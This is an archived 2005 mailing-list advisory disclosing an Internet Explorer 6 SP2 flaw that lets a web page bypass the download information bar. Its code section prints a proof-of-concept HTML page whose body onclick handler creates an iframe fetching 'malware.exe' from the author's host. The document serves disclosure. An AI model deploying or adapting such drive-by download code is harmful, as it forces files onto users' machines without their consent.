[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050113143012.8F271101D0@ws1-3.us4.outblaze.com>
From: the_insider at mail.com (The Insider)
Subject: (no subject)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: Internet Explorer
Vendors: http://www.microsoft.com
Versions: 6.0.2900.2180.xpsp_sp2_rtm.040803-2158
Patched With: SP2;
Platforms: Windows
Bug: Remote File Download Information Bar Bypass
Exploitation: Remote with browser
Date: 13 Jan 2005
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@...l.com
web: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============
1) Introduction
===============
Internet Explorer is currently the most common internet browser in the world.
Microsoft Windows XP Service Pack 2 was designed to block any file download
by an information bar which must be clicked and selected with "Download File".
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
======
2) Bug
======
While trying to download a file Microsoft Internet Explorer
the user gets the information bar. The information bar
mechanism blocks/catches all references to download-able files,
even through javascripts and HTML Event properties.
However Microsoft's Internet Explorer (SP2) DOES NOT CATCH
"body" tag with the HTML "onclick" event which dynamically
created "iframe" tags. For a good, more complicated dynamic
object creation i used the "createElement" function.
This way an attacker can make a user download a file with him just
clicking anywhere on the page (not on an hyperlink).
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===========
3) The Code
===========
Paste into an htm/html file and add "<" at the begining of each line:
------------------------ cut here --------------------------------------
!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
!-- saved from url=(0031)http://theinsider.deep-ice.com/ -->
HTML><HEAD><TITLE>The-Insider http://theinsider.deep-ice.com</TITLE>
META http-equiv=expires content="01 Jan 1998 01:01:00 GMT">
META http-equiv=Content-Type content="text/html; charset=windows-1252">
META http-equiv=Content-Language content=en-us>
META content=True name=HandheldFriendly>
META content="MSHTML 6.00.2900.2523" name=GENERATOR></HEAD>
embed>
body onclick='a=document.createElement("\<iframe src=\"http:\/
\/theinsider.deep-
ice.com\/malware.exe\"\>\<\/iframe\>");document.body.appendChild
(a);setTimeout("document.execCommand\(\"refresh\")",1000)'>
cebter><br><br><br><br><br><br>Click AnyWhere You Want</center>
/BODY></HTML>
------------------------ cut here --------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Scripts and Codes will make me D.O.S , but they will never HACK me."
--
___________________________________________________________
Sign-up for Ads Free at Mail.com
http://promo.mail.com/adsfreejump.htm
Powered by blists - more mailing lists